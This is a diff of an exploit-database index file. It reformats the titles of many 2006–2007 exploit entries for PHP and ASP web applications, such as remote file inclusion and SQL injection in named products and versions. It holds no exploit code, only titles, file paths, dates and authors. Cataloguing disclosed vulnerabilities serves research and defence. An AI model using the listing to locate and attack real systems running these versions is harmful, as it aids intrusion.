 2727,platforms/php/webapps/2727.txt,"OpenEMR 2.8.1 - (srcdir) Multiple Remote File Inclusion",2006-11-06,the_day,php,webapps,0
 2728,platforms/php/webapps/2728.txt,"Article Script 1.6.3 - 'rss.php' SQL Injection",2006-11-06,Liz0ziM,php,webapps,0
 2731,platforms/php/webapps/2731.pl,"iPrimal Forums - 'admin/index.php' Change User Password Exploit",2006-11-06,Bl0od3r,php,webapps,0
-2732,platforms/php/webapps/2732.txt,"PHPGiggle 12.08 - (CFG_PHPGIGGLE_ROOT) File Inclusion",2006-11-06,ajann,php,webapps,0
+2732,platforms/php/webapps/2732.txt,"PHPGiggle 12.08 - 'CFG_PHPGIGGLE_ROOT' File Inclusion",2006-11-06,ajann,php,webapps,0
 2733,platforms/php/webapps/2733.txt,"iWare Pro 5.0.4 - 'chat_panel.php' Remote Code Execution",2006-11-07,nuffsaid,php,webapps,0
 2736,platforms/php/webapps/2736.txt,"PHPAdventure 1.1 - 'ad_main.php' Remote File Inclusion",2006-11-07,HER0,php,webapps,0
 2739,platforms/php/webapps/2739.txt,"iPrimal Forums - 'admin/index.php' Remote File Inclusion",2006-11-08,Bl0od3r,php,webapps,0
@@ -17733,10 +17737,10 @@ id,file,description,date,author,platform,type,port
 2938,platforms/php/webapps/2938.htm,"Bandwebsite 1.5 - 'LOGIN' Remote Add Admin",2006-12-16,H0tTurk-,php,webapps,0
 2939,platforms/php/webapps/2939.txt,"mxBB Module WebLinks 2.05 - Remote File Inclusion",2006-12-16,ajann,php,webapps,0
 2940,platforms/php/webapps/2940.txt,"mxbb module charts 1.0.0 - Remote File Inclusion",2006-12-16,ajann,php,webapps,0
-2941,platforms/php/webapps/2941.txt,"mxBB Module Meeting 1.1.2 - Remote FileInclusion",2006-12-16,ajann,php,webapps,0
+2941,platforms/php/webapps/2941.txt,"mxBB Module Meeting 1.1.2 - Remote File Inclusion",2006-12-16,ajann,php,webapps,0
 2943,platforms/php/webapps/2943.txt,"Azucar CMS 1.3 - 'admin/index_sitios.php' File Inclusion",2006-12-18,nuffsaid,php,webapps,0
 2944,platforms/php/webapps/2944.txt,"VerliAdmin 0.3 - 'index.php' Remote File Inclusion",2006-12-18,Kacper,php,webapps,0
-2945,platforms/php/webapps/2945.txt,"Uploader & Downloader 3.0 - (id_user) SQL Injection",2006-12-18,"the master",php,webapps,0
+2945,platforms/php/webapps/2945.txt,"Uploader & Downloader 3.0 - 'id_user' SQL Injection",2006-12-18,"the master",php,webapps,0
 2948,platforms/php/webapps/2948.txt,"RateMe 1.3.2 - 'main.inc.php' Remote File Inclusion",2006-12-18,"Al7ejaz Hacker",php,webapps,0
 2953,platforms/php/webapps/2953.php,"PHP-Update 2.7 - 'extract()' Authentication Bypass / Shell Injection",2006-12-19,rgod,php,webapps,0
 2955,platforms/php/webapps/2955.txt,"Paristemi 0.8.3b - 'buycd.php' Remote File Inclusion",2006-12-19,nuffsaid,php,webapps,0
@@ -17790,7 +17794,7 @@ id,file,description,date,author,platform,type,port
 3011,platforms/php/webapps/3011.pl,"Fishyshoop 0.930b - Remote Add Administrator Account Exploit",2006-12-25,"James Gray",php,webapps,0
 3012,platforms/php/webapps/3012.txt,"Okul Merkezi Portal 1.0 - 'ataturk.php' Remote File Inclusion",2006-12-25,ShaFuck31,php,webapps,0
 3014,platforms/php/webapps/3014.txt,"logahead UNU edition 1.0 - Arbitrary File Upload / Code Execution",2006-12-25,CorryL,php,webapps,0
-3015,platforms/asp/webapps/3015.pl,"The Classified Ad System 1.0 - (main) SQL Injection",2006-12-26,ajann,asp,webapps,0
+3015,platforms/asp/webapps/3015.pl,"The Classified Ad System 1.0 - 'main' SQL Injection",2006-12-26,ajann,asp,webapps,0
 3016,platforms/php/webapps/3016.php,"Cahier de texte 2.2 - Bypass General Access Protection Exploit",2006-12-26,DarkFig,php,webapps,0
 3017,platforms/php/webapps/3017.php,"PHP-Update 2.7 - Multiple Vulnerabilities",2006-12-26,rgod,php,webapps,0
 3018,platforms/php/webapps/3018.txt,"mxBB Module pafiledb 2.0.1b - Remote File Inclusion",2006-12-26,bd0rk,php,webapps,0
@@ -17881,14 +17885,14 @@ id,file,description,date,author,platform,type,port
 3171,platforms/php/webapps/3171.pl,"Mafia Scum Tools 2.0.0 - 'index.php gen' Remote File Inclusion",2007-01-21,DeltahackingTEAM,php,webapps,0
 3172,platforms/php/webapps/3172.php,"webSPELL 4.01.02 - 'gallery.php' Blind SQL Injection",2007-01-21,r00t,php,webapps,0
 3174,platforms/php/webapps/3174.txt,"Upload Service 1.0 - 'top.php maindir' Remote File Inclusion",2007-01-21,y3dips,php,webapps,0
-3175,platforms/php/webapps/3175.pl,"VisoHotlink 1.01 - functions.visohotlink.php Remote File Inclusion",2007-01-22,bd0rk,php,webapps,0
+3175,platforms/php/webapps/3175.pl,"VisoHotlink 1.01 - 'functions.visohotlink.php' Remote File Inclusion",2007-01-22,bd0rk,php,webapps,0
 3180,platforms/php/webapps/3180.pl,"Vote-Pro 4.0 - 'poll_frame.php poll_id' Remote Code Execution",2007-01-23,r0ut3r,php,webapps,0
 3183,platforms/php/webapps/3183.txt,"BBClone 0.31 - 'selectlang.php' Remote File Inclusion",2007-01-23,3l3ctric-Cracker,php,webapps,0
 3184,platforms/php/webapps/3184.txt,"phpXD 0.3 - (path) Remote File Inclusion",2007-01-23,3l3ctric-Cracker,php,webapps,0
 3185,platforms/php/webapps/3185.txt,"RPW 1.0.2 - 'config.php sql_language' Remote File Inclusion",2007-01-24,3l3ctric-Cracker,php,webapps,0
 3186,platforms/asp/webapps/3186.txt,"ASP EDGE 1.2b - 'user.asp' SQL Injection",2007-01-24,ajann,asp,webapps,0
 3187,platforms/asp/webapps/3187.txt,"ASP NEWS 3.0 - 'news_detail.asp' SQL Injection",2007-01-24,ajann,asp,webapps,0
-3191,platforms/php/webapps/3191.txt,"vhostadmin 0.1 - (MODULES_DIR) Remote File Inclusion",2007-01-24,3l3ctric-Cracker,php,webapps,0
+3191,platforms/php/webapps/3191.txt,"vhostadmin 0.1 - 'MODULES_DIR' Remote File Inclusion",2007-01-24,3l3ctric-Cracker,php,webapps,0
 3192,platforms/php/webapps/3192.pl,"Xero Portal - 'phpbb_root_path' Remote File Inclusion",2007-01-24,"Mehmet Ince",php,webapps,0
 3194,platforms/asp/webapps/3194.txt,"makit Newsposter Script 3.0 - SQL Injection",2007-01-25,ajann,asp,webapps,0
 3195,platforms/asp/webapps/3195.txt,"GPS CMS 1.2 - 'print.asp' SQL Injection",2007-01-25,ajann,asp,webapps,0
@@ -17982,7 +17986,7 @@ id,file,description,date,author,platform,type,port
 3324,platforms/php/webapps/3324.txt,"Htaccess Passwort Generator 1.1 - (ht_pfad) Remote File Inclusion",2007-02-16,kezzap66345,php,webapps,0
 3325,platforms/php/webapps/3325.pl,"webSPELL 4.01.02 - (showonly) Blind SQL Injection",2007-02-16,DNX,php,webapps,0
 3326,platforms/php/webapps/3326.txt,"Vivvo Article Manager 3.4 - 'root' Local File Inclusion",2007-02-16,Snip0r,php,webapps,0
-3327,platforms/php/webapps/3327.txt,"XLAtunes 0.1 - (album) SQL Injection",2007-02-17,Bl0od3r,php,webapps,0
+3327,platforms/php/webapps/3327.txt,"XLAtunes 0.1 - 'album' SQL Injection",2007-02-17,Bl0od3r,php,webapps,0
 3328,platforms/php/webapps/3328.htm,"S-Gastebuch 1.5.3 - (gb_pfad) Remote File Inclusion",2007-02-18,ajann,php,webapps,0
 3332,platforms/php/webapps/3332.pl,"Xpression News 1.0.1 - 'archives.php' Remote File Disclosure",2007-02-18,r0ut3r,php,webapps,0
 3334,platforms/php/webapps/3334.asp,"PHP-Nuke Module Emporium 2.3.0 - SQL Injection",2007-02-19,ajann,php,webapps,0
@@ -17994,7 +17998,7 @@ id,file,description,date,author,platform,type,port
 3345,platforms/php/webapps/3345.pl,"PHP-Nuke 8.0 Final - (INSERT) SQL Injection",2007-02-20,krasza,php,webapps,0
 3346,platforms/php/webapps/3346.pl,"PHP-Nuke 8.0 Final - (HTTP Referers) SQL Injection",2007-02-20,krasza,php,webapps,0
 3348,platforms/php/webapps/3348.txt,"SendStudio 2004.14 - (ROOTDIR) Remote File Inclusion",2007-02-20,K-159,php,webapps,0
-3351,platforms/php/webapps/3351.pl,"webSPELL 4.01.02 - (topic) SQL Injection",2007-02-21,DNX,php,webapps,0
+3351,platforms/php/webapps/3351.pl,"webSPELL 4.01.02 - 'topic' SQL Injection",2007-02-21,DNX,php,webapps,0
 3352,platforms/php/webapps/3352.php,"Connectix Boards 0.7 - 'p_skin' Multiple Vulnerabilities",2007-02-21,DarkFig,php,webapps,0
 3353,platforms/php/webapps/3353.txt,"DBImageGallery 1.2.2 - (donsimg_base_path) Remote File Inclusion",2007-02-21,Denven,php,webapps,0
 3354,platforms/php/webapps/3354.txt,"DBGuestbook 1.1 - (dbs_base_path) Remote File Inclusion",2007-02-21,Denven,php,webapps,0
@@ -18018,7 +18022,7 @@ id,file,description,date,author,platform,type,port
 39567,platforms/php/webapps/39567.txt,"Monstra CMS 3.0.3 - Multiple Vulnerabilities",2016-03-16,"Sarim Kiani",php,webapps,80
 3398,platforms/php/webapps/3398.txt,"Mani Stats Reader 1.2 - (ipath) Remote File Inclusion",2007-03-02,mozi,php,webapps,0
 3400,platforms/php/webapps/3400.pl,"webSPELL 4.01.02 - Multiple SQL Injections",2007-03-02,DNX,php,webapps,0
-3402,platforms/php/webapps/3402.php,"webSPELL 4.01.02 - Remote PHP Code Execution",2007-03-03,DarkFig,php,webapps,0
+3402,platforms/php/webapps/3402.php,"webSPELL 4.01.02 - PHP Remote Code Execution",2007-03-03,DarkFig,php,webapps,0
 3403,platforms/php/webapps/3403.php,"Rigter Portal System (RPS) 6.2 - Blind SQL Injection",2007-03-04,s0cratex,php,webapps,0
 3406,platforms/php/webapps/3406.pl,"News-Letterman 1.1 - 'eintrag.php sqllog' Remote File Inclusion",2007-03-04,bd0rk,php,webapps,0
 3408,platforms/php/webapps/3408.pl,"AJ Auction Pro - 'subcat.php' SQL Injection",2007-03-04,ajann,php,webapps,0
@@ -18082,7 +18086,7 @@ id,file,description,date,author,platform,type,port
 3509,platforms/php/webapps/3509.pl,"ScriptMagix Jokes 2.0 - 'index.php catid' SQL Injection",2007-03-18,ajann,php,webapps,0
 3510,platforms/php/webapps/3510.pl,"ScriptMagix Recipes 2.0 - 'index.php catid' SQL Injection",2007-03-18,ajann,php,webapps,0
 3511,platforms/php/webapps/3511.pl,"ScriptMagix Photo Rating 2.0 - SQL Injection",2007-03-18,ajann,php,webapps,0
-3512,platforms/php/webapps/3512.txt,"PHP-Nuke - iFrame (iframe.php) Remote File Inclusion",2007-03-18,"Cold Zero",php,webapps,0
+3512,platforms/php/webapps/3512.txt,"PHP-Nuke - 'iframe.php' Remote File Inclusion",2007-03-18,"Cold Zero",php,webapps,0
 3513,platforms/php/webapps/3513.php,"Katalog Plyt Audio (pl) 1.0 - SQL Injection",2007-03-18,Kacper,php,webapps,0
 3515,platforms/php/webapps/3515.pl,"ScriptMagix Lyrics 2.0 - 'index.php recid' SQL Injection",2007-03-19,ajann,php,webapps,0
 3516,platforms/php/webapps/3516.php,"MetaForum 0.513 Beta - Arbitrary File Upload",2007-03-19,Gu1ll4um3r0m41n,php,webapps,0
@@ -18154,7 +18158,7 @@ id,file,description,date,author,platform,type,port
 3625,platforms/php/webapps/3625.pl,"XOOPS Module Tiny Event 1.01 - 'id' SQL Injection",2007-04-01,ajann,php,webapps,0
 3626,platforms/php/webapps/3626.pl,"XOOPS Module Kshop 1.17 - 'id' SQL Injection",2007-04-01,ajann,php,webapps,0
 3628,platforms/php/webapps/3628.txt,"CWB PRO 1.5 - 'INCLUDE_PATH' Remote File Inclusion",2007-04-01,GoLd_M,php,webapps,0
-3629,platforms/php/webapps/3629.pl,"XOOPS Module Camportail 1.1 - (camid) SQL Injection",2007-04-01,ajann,php,webapps,0
+3629,platforms/php/webapps/3629.pl,"XOOPS Module Camportail 1.1 - 'camid' SQL Injection",2007-04-01,ajann,php,webapps,0
 3630,platforms/php/webapps/3630.htm,"XOOPS Module debaser 0.92 - 'genre.php' Blind SQL Injection",2007-04-01,ajann,php,webapps,0
 3631,platforms/php/webapps/3631.txt,"FlexPHPNews 0.0.5 - 'newsid' Parameter SQL Injection",2007-04-01,Dj7xpl,php,webapps,0
 3632,platforms/php/webapps/3632.pl,"XOOPS Module myAlbum-P 2.0 - 'cid' SQL Injection",2007-04-01,ajann,php,webapps,0
@@ -18174,7 +18178,7 @@ id,file,description,date,author,platform,type,port
 3659,platforms/php/webapps/3659.txt,"AROUNDMe 0.7.7 - Multiple Remote File Inclusion",2007-04-04,kezzap66345,php,webapps,0
 3660,platforms/php/webapps/3660.pl,"CyBoards PHP Lite 1.21 - (script_path) Remote File Inclusion",2007-04-04,bd0rk,php,webapps,0
 3663,platforms/php/webapps/3663.htm,"XOOPS Module WF-Snippets 1.02 (c) - Blind SQL Injection",2007-04-04,ajann,php,webapps,0
-3665,platforms/php/webapps/3665.htm,"Mutant 0.9.2 - mutant_functions.php Remote File Inclusion",2007-04-04,bd0rk,php,webapps,0
+3665,platforms/php/webapps/3665.htm,"Mutant 0.9.2 - 'mutant_functions.php' Remote File Inclusion",2007-04-04,bd0rk,php,webapps,0
 3666,platforms/php/webapps/3666.pl,"XOOPS Module Rha7 Downloads 1.0 - 'visit.php' SQL Injection",2007-04-04,ajann,php,webapps,0
 3667,platforms/php/webapps/3667.txt,"Sisplet CMS 05.10 - 'site_path' Parameter Remote File Inclusion",2007-04-05,kezzap66345,php,webapps,0
 3668,platforms/php/webapps/3668.txt,"CodeWand phpBrowse - (site_path) Remote File Inclusion",2007-04-05,kezzap66345,php,webapps,0
@@ -18324,7 +18328,7 @@ id,file,description,date,author,platform,type,port
 3885,platforms/php/webapps/3885.txt,"telltarget 1.3.3 - (tt_docroot) Remote File Inclusion",2007-05-09,GoLd_M,php,webapps,0
 3886,platforms/php/webapps/3886.pl,"SimpleNews 1.0.0 FINAL - 'print.php news_id' SQL Injection",2007-05-09,Silentz,php,webapps,0
 3887,platforms/php/webapps/3887.pl,"TutorialCMS 1.00 - 'search.php search' SQL Injection",2007-05-09,Silentz,php,webapps,0
-3894,platforms/php/webapps/3894.txt,"Original 0.11 - config.inc.php x[1] Remote File Inclusion",2007-05-10,GoLd_M,php,webapps,0
+3894,platforms/php/webapps/3894.txt,"Original 0.11 - 'config.inc.php' 'x[1]' Remote File Inclusion",2007-05-10,GoLd_M,php,webapps,0
 3895,platforms/php/webapps/3895.txt,"Thyme Calendar 1.3 - SQL Injection",2007-05-10,warlord,php,webapps,0
 3896,platforms/php/webapps/3896.pl,"TaskDriver 1.2 - Login Bypass / SQL Injection",2007-05-10,Silentz,php,webapps,0
 3900,platforms/php/webapps/3900.php,"Snaps! Gallery 1.4.4 - Remote User Pass Change Exploit",2007-05-11,Dj7xpl,php,webapps,0
@@ -18348,13 +18352,13 @@ id,file,description,date,author,platform,type,port
 3931,platforms/php/webapps/3931.htm,"XOOPS Module resmanager 1.21 - Blind SQL Injection",2007-05-15,ajann,php,webapps,0
 3932,platforms/php/webapps/3932.pl,"XOOPS Module Glossarie 1.7 - 'sid' SQL Injection",2007-05-15,ajann,php,webapps,0
 3933,platforms/php/webapps/3933.pl,"XOOPS Module MyConference 1.0 - 'index.php' SQL Injection",2007-05-15,ajann,php,webapps,0
-3935,platforms/php/webapps/3935.txt,"Glossword 1.8.1 - custom_vars.php Remote File Inclusion",2007-05-16,BeyazKurt,php,webapps,0
+3935,platforms/php/webapps/3935.txt,"Glossword 1.8.1 - 'custom_vars.php' Remote File Inclusion",2007-05-16,BeyazKurt,php,webapps,0
 3936,platforms/asp/webapps/3936.txt,"runawaysoft haber portal 1.0 - 'tr' Multiple Vulnerabilities",2007-05-16,kerem125,asp,webapps,0
 3941,platforms/php/webapps/3941.txt,"PHPGlossar 0.8 - (format_menue) Remote File Inclusion",2007-05-16,kezzap66345,php,webapps,0
 3942,platforms/php/webapps/3942.pl,"SimpNews 2.40.01 - 'newnr' Parameter SQL Injection",2007-05-16,Silentz,php,webapps,0
 3943,platforms/php/webapps/3943.pl,"FAQEngine 4.16.03 - 'question.php questionref' SQL Injection",2007-05-16,Silentz,php,webapps,0
 3944,platforms/php/webapps/3944.txt,"Mambo Component com_yanc 1.4 Beta - 'id' SQL Injection",2007-05-17,"Mehmet Ince",php,webapps,0
-3946,platforms/php/webapps/3946.txt,"GeekLog 2.x - ImageImageMagick.php Remote File Inclusion",2007-05-17,diesl0w,php,webapps,0
+3946,platforms/php/webapps/3946.txt,"GeekLog 2.x - 'ImageImageMagick.php' Remote File Inclusion",2007-05-17,diesl0w,php,webapps,0
 3947,platforms/php/webapps/3947.txt,"Build it Fast (bif3) 0.4.1 - Multiple Remote File Inclusion",2007-05-17,"Alkomandoz Hacker",php,webapps,0
 3948,platforms/php/webapps/3948.txt,"Libstats 1.0.3 - 'template_csv.php' Remote File Inclusion",2007-05-18,"Mehmet Ince",php,webapps,0
 3949,platforms/php/webapps/3949.txt,"MolyX BOARD 2.5.0 - 'index.php lang' Local File 
Inclusion",2007-05-18,MurderSkillz,php,webapps,0
@@ -18391,7 +18395,7 @@ id,file,description,date,author,platform,type,port
 4004,platforms/php/webapps/4004.php,"Inout Search Engine - Remote Code Execution",2007-05-29,BlackHawk,php,webapps,0
 4005,platforms/php/webapps/4005.txt,"AdminBot 9.0.5 - 'live_status.lib.php' Remote File Inclusion",2007-05-29,"ThE TiGeR",php,webapps,0
 4006,platforms/php/webapps/4006.php,"Pheap 2.0 - Authentication Bypass / Remote Code Execution",2007-05-29,Silentz,php,webapps,0
-4007,platforms/asp/webapps/4007.txt,"Vizayn Urun Tanitim Sistemi 0.2 - (tr) SQL Injection",2007-05-30,BAHADIR,asp,webapps,0
+4007,platforms/asp/webapps/4007.txt,"Vizayn Urun Tanitim Sistemi 0.2 - 'tr' SQL Injection",2007-05-30,BAHADIR,asp,webapps,0
 4019,platforms/php/webapps/4019.php,"Particle Gallery 1.0.1 - SQL Injection",2007-06-01,Silentz,php,webapps,0
 4020,platforms/php/webapps/4020.php,"RevokeBB 1.0 RC4 - Blind SQL Injection / Hash Retrieve Exploit",2007-06-01,BlackHawk,php,webapps,0
 4022,platforms/php/webapps/4022.htm,"XOOPS Module icontent 1.0/4.5 - Remote File Inclusion",2007-06-01,GoLd_M,php,webapps,0
@@ -18559,7 +18563,7 @@ id,file,description,date,author,platform,type,port
 4317,platforms/php/webapps/4317.txt,"2532/Gigs 1.2.1 - 'activateuser.php' Local File Inclusion",2007-08-26,bd0rk,php,webapps,0
 4320,platforms/php/webapps/4320.txt,"SomeryC 0.2.4 - 'include.php skindir' Remote File Inclusion",2007-08-27,Katatafish,php,webapps,0
 4326,platforms/php/webapps/4326.txt,"Arcadem 2.01 - SQL Injection / Remote File Inclusion",2007-08-27,SmOk3,php,webapps,0
-4327,platforms/php/webapps/4327.txt,"WBB2-Addon: Acrotxt 1.0 - (show) SQL Injection",2007-08-27,D4m14n,php,webapps,0
+4327,platforms/php/webapps/4327.txt,"WBB2-Addon: Acrotxt 1.0 - 'show' SQL Injection",2007-08-27,D4m14n,php,webapps,0
 4329,platforms/php/webapps/4329.txt,"Micro CMS 3.5 - 'revert-content.php' SQL Injection",2007-08-28,"not sec group",php,webapps,0
 4330,platforms/php/webapps/4330.txt,"ACG News 1.0 - 'aid'/'catid' SQL Injection",2007-08-28,SmOk3,php,webapps,0
 4331,platforms/php/webapps/4331.pl,"DL PayCart 1.01 - 'viewitem.php ItemID' Blind SQL Injection",2007-08-28,irvian,php,webapps,0
@@ -18578,7 +18582,7 @@ id,file,description,date,author,platform,type,port
 4352,platforms/php/webapps/4352.txt,"Weblogicnet - (files_dir) Multiple Remote File Inclusion",2007-09-02,bius,php,webapps,0
 4353,platforms/php/webapps/4353.txt,"Yvora CMS 1.0 - 'error_view.php ID' SQL Injection",2007-09-02,k1tk4t,php,webapps,0
 4356,platforms/php/webapps/4356.txt,"eNetman 20050830 - 'index.php' Remote File Inclusion",2007-09-03,JaheeM,php,webapps,0
-4358,platforms/php/webapps/4358.txt,"STPHPLibrary - (STPHPLIB_DIR) Remote File Inclusion",2007-09-03,leetsecurity,php,webapps,0
+4358,platforms/php/webapps/4358.txt,"STPHPLibrary - 'STPHPLIB_DIR' Remote File Inclusion",2007-09-03,leetsecurity,php,webapps,0
 4363,platforms/php/webapps/4363.txt,"PHPOF 20040226 - 'DB_adodb.class.php' Remote File Inclusion",2007-09-04,"ThE TiGeR",php,webapps,0
 4365,platforms/php/webapps/4365.txt,"AnyInventory 2.0 - 'Environment.php' Remote File Inclusion",2007-09-05,"ThE TiGeR",php,webapps,0
 4368,platforms/php/webapps/4368.txt,"PHPMytourney - 'menu.php' Remote File Inclusion",2007-09-06,S.W.A.T.,php,webapps,0
@@ -18604,7 +18608,7 @@ id,file,description,date,author,platform,type,port
 4401,platforms/php/webapps/4401.txt,"Joomla! Component Joomlaradio 5.0 - Remote File Inclusion",2007-09-13,Morgan,php,webapps,0
 4404,platforms/php/webapps/4404.txt,"GForge < 4.6b2 - 'skill_delete' Parameter SQL Injection",2007-09-13,"Sumit Siddharth",php,webapps,0
 4405,platforms/php/webapps/4405.txt,"Ajax File Browser 3b - 'settings.inc.php approot' Remote File Inclusion",2007-09-14,"arfis project",php,webapps,0
-4406,platforms/php/webapps/4406.txt,"phpFFL 1.24 - PHPFFL_FILE_ROOT Remote File Inclusion",2007-09-14,Dj7xpl,php,webapps,0
+4406,platforms/php/webapps/4406.txt,"phpFFL 1.24 - 'PHPFFL_FILE_ROOT' Remote File Inclusion",2007-09-14,Dj7xpl,php,webapps,0
 4407,platforms/php/webapps/4407.java,"PHP Webquest 2.5 - (id_actividad) SQL Injection",2007-09-14,D4real_TeaM,php,webapps,0
 4408,platforms/php/webapps/4408.pl,"JBlog 1.0 - 'index.php id' SQL Injection",2007-09-14,s4mi,php,webapps,0
 4410,platforms/php/webapps/4410.php,"Gelato - 'index.php post' SQL Injection",2007-09-14,s0cratex,php,webapps,0
@@ -18651,7 +18655,7 @@ id,file,description,date,author,platform,type,port
 4467,platforms/php/webapps/4467.pl,"MD-Pro 1.0.76 - SQL Injection",2007-09-29,undefined1_,php,webapps,0
 4469,platforms/php/webapps/4469.txt,"Mambo Component Mambads 1.5 - SQL Injection",2007-09-29,Sniper456,php,webapps,0
 4470,platforms/php/webapps/4470.txt,"mxBB Module mx_glance 2.3.3 - Remote File Inclusion",2007-09-29,bd0rk,php,webapps,0
-4471,platforms/php/webapps/4471.txt,"phpBB Mod OpenID 0.2.0 - BBStore.php Remote File Inclusion",2007-09-30,"Mehmet Ince",php,webapps,0
+4471,platforms/php/webapps/4471.txt,"phpBB Mod OpenID 0.2.0 - 'BBStore.php' Remote File Inclusion",2007-09-30,"Mehmet Ince",php,webapps,0
 4472,platforms/php/webapps/4472.txt,"actSite 1.56 - 'news.php' Local File Inclusion",2007-10-01,DNX,php,webapps,0
 4473,platforms/php/webapps/4473.txt,"actSite 1.991 Beta - 'base.php' Remote File Inclusion",2007-10-01,DNX,php,webapps,0
 4475,platforms/php/webapps/4475.php,"PHP-Fusion module Expanded Calendar 2.x - SQL Injection",2007-10-01,Matrix86,php,webapps,0
@@ -18676,7 +18680,7 @@ id,file,description,date,author,platform,type,port
 4500,platforms/php/webapps/4500.txt,"TorrentTrader Classic 1.07 - Multiple Vulnerabilities",2007-10-08,"HACKERS PAL",php,webapps,0
 4501,platforms/php/webapps/4501.php,"PHP Homepage M 1.0 - galerie.php SQL Injection",2007-10-08,"[PHCN] Mahjong",php,webapps,0
 4502,platforms/php/webapps/4502.txt,"xKiosk 3.0.1i - 'xkurl.php PEARPATH' Remote File Inclusion",2007-10-08,"BorN To K!LL",php,webapps,0
-4503,platforms/php/webapps/4503.txt,"LiveAlbum 0.9.0 - common.php Remote File Inclusion",2007-10-08,S.W.A.T.,php,webapps,0
+4503,platforms/php/webapps/4503.txt,"LiveAlbum 0.9.0 - 'common.php' Remote File Inclusion",2007-10-08,S.W.A.T.,php,webapps,0
 4504,platforms/php/webapps/4504.txt,"Softbiz Jobs & Recruitment - SQL Injection",2007-10-08,"Khashayar Fereidani",php,webapps,0
 4505,platforms/php/webapps/4505.php,"LightBlog 8.4.1.1 - Remote Code Execution",2007-10-09,BlackHawk,php,webapps,0
 4507,platforms/php/webapps/4507.txt,"Joomla! Component mp3 allopass 1.0 - Remote File Inclusion",2007-10-10,NoGe,php,webapps,0
@@ -18687,7 +18691,7 @@ id,file,description,date,author,platform,type,port
 4512,platforms/php/webapps/4512.txt,"nuseo PHP enterprise 1.6 - Remote File Inclusion",2007-10-10,BiNgZa,php,webapps,0
 4513,platforms/php/webapps/4513.php,"PHP-Stats 0.1.9.2 - Multiple Vulnerabilities",2007-10-10,EgiX,php,webapps,0
 4518,platforms/php/webapps/4518.txt,"WebDesktop 0.1 - Remote File Inclusion",2007-10-11,S.W.A.T.,php,webapps,0
-4519,platforms/php/webapps/4519.txt,"Pindorama 0.1 - client.php Remote File Inclusion",2007-10-11,S.W.A.T.,php,webapps,0
+4519,platforms/php/webapps/4519.txt,"Pindorama 0.1 - 'client.php' Remote File Inclusion",2007-10-11,S.W.A.T.,php,webapps,0
 4520,platforms/php/webapps/4520.txt,"PicoFlat CMS 0.4.14 - 'index.php' Remote File Inclusion",2007-10-11,0in,php,webapps,0
 4521,platforms/php/webapps/4521.txt,"Joomla! Component Flash uploader 2.5.1 - Remote File Inclusion",2007-10-11,mdx,php,webapps,0
 4523,platforms/php/webapps/4523.pl,"KwsPHP 1.0 Module Newsletter - SQL Injection",2007-10-11,s4mi,php,webapps,0
@@ -18708,8 +18712,8 @@ id,file,description,date,author,platform,type,port
 4549,platforms/php/webapps/4549.txt,"PHP Project Management 0.8.10 - Multiple Local/Remote File Inclusions",2007-10-21,GoLd_M,php,webapps,0
 4550,platforms/php/webapps/4550.pl,"BBPortalS 2.0 - Blind SQL Injection",2007-10-21,Max007,php,webapps,0
 4551,platforms/php/webapps/4551.txt,"PeopleAggregator 1.2pre6-release-53 - Multiple Remote File Inclusion",2007-10-21,GoLd_M,php,webapps,0
-4554,platforms/php/webapps/4554.txt,"Socketmail 2.2.8 - fnc-readmail3.php Remote File Inclusion",2007-10-22,BiNgZa,php,webapps,0
-4555,platforms/php/webapps/4555.txt,"TOWeLS 0.1 - scripture.php Remote File Inclusion",2007-10-22,GoLd_M,php,webapps,0
+4554,platforms/php/webapps/4554.txt,"Socketmail 2.2.8 - 'fnc-readmail3.php' Remote File Inclusion",2007-10-22,BiNgZa,php,webapps,0
+4555,platforms/php/webapps/4555.txt,"TOWeLS 0.1 - 'scripture.php' Remote File Inclusion",2007-10-22,GoLd_M,php,webapps,0
 4557,platforms/php/webapps/4557.txt,"Simple PHP Blog (sPHPblog) 0.5.1 - Multiple Vulnerabilities",2007-10-22,DarkFig,php,webapps,0
 4558,platforms/php/webapps/4558.txt,"InstaGuide Weather Script 1.0 - 'index.php' Local File Inclusion",2007-10-22,"BorN To K!LL",php,webapps,0
 4561,platforms/php/webapps/4561.txt,"Flatnuke 3 - Remote Command Execution / Privilege Escalation",2007-10-23,KiNgOfThEwOrLd,php,webapps,0
@@ -18722,7 +18726,7 @@ id,file,description,date,author,platform,type,port
 4577,platforms/php/webapps/4577.txt,"CaupoShop Pro 2.x - 'action' Remote File Inclusion",2007-10-28,mozi,php,webapps,0
 4578,platforms/asp/webapps/4578.txt,"emagiC CMS.Net 4.0 - 'emc.asp' SQL Injection",2007-10-28,hak3r-b0y,asp,webapps,0
 4580,platforms/php/webapps/4580.txt,"FireConfig 0.5 - 'dl.php' Remote File Disclosure",2007-10-28,GoLd_M,php,webapps,0
-4581,platforms/php/webapps/4581.txt,"Sige 0.1 - sige_init.php Remote File Inclusion",2007-10-28,GoLd_M,php,webapps,0
+4581,platforms/php/webapps/4581.txt,"Sige 0.1 - 'sige_init.php' Remote File Inclusion",2007-10-28,GoLd_M,php,webapps,0
 4582,platforms/php/webapps/4582.txt,"teatro 1.6 - (basePath) Remote File Inclusion",2007-10-28,"Alkomandoz Hacker",php,webapps,0
 4585,platforms/php/webapps/4585.txt,"MySpace Resource Script (MSRS) 1.21 - Remote File Inclusion",2007-10-29,r00t@zapak.com,php,webapps,0
 4586,platforms/php/webapps/4586.txt,"ProfileCMS 1.0 - Arbitrary File Upload",2007-10-29,r00t@zapak.com,php,webapps,0
@@ -18733,7 +18737,7 @@ id,file,description,date,author,platform,type,port
 4592,platforms/php/webapps/4592.txt,"ISPworker 1.21 - download.php Remote File Disclosure",2007-10-31,GoLd_M,php,webapps,0
 4593,platforms/php/webapps/4593.txt,"WordPress Plugin BackUpWordPress 0.4.2b - Remote File Inclusion",2007-11-01,S.W.A.T.,php,webapps,0
 4595,platforms/php/webapps/4595.txt,"Synergiser 1.2 RC1 - Local File Inclusion / Full Path Disclosure",2007-11-02,KiNgOfThEwOrLd,php,webapps,0
-4596,platforms/php/webapps/4596.txt,"Scribe 0.2 - Remote PHP Code Execution",2007-11-02,KiNgOfThEwOrLd,php,webapps,0
+4596,platforms/php/webapps/4596.txt,"Scribe 0.2 - PHP Remote Code Execution",2007-11-02,KiNgOfThEwOrLd,php,webapps,0
 4597,platforms/php/webapps/4597.txt,"DM Guestbook 0.4.1 - Multiple Local File Inclusion",2007-11-02,GoLd_M,php,webapps,0
 4599,platforms/php/webapps/4599.txt,"Ax Developer CMS 0.1.1 - 'index.php module' Local File Inclusion",2007-11-02,GoLd_M,php,webapps,0
 4602,platforms/php/webapps/4602.txt,"GuppY 4.6.3 - 'includes.inc selskin' Remote File Inclusion",2007-11-03,irk4z,php,webapps,0
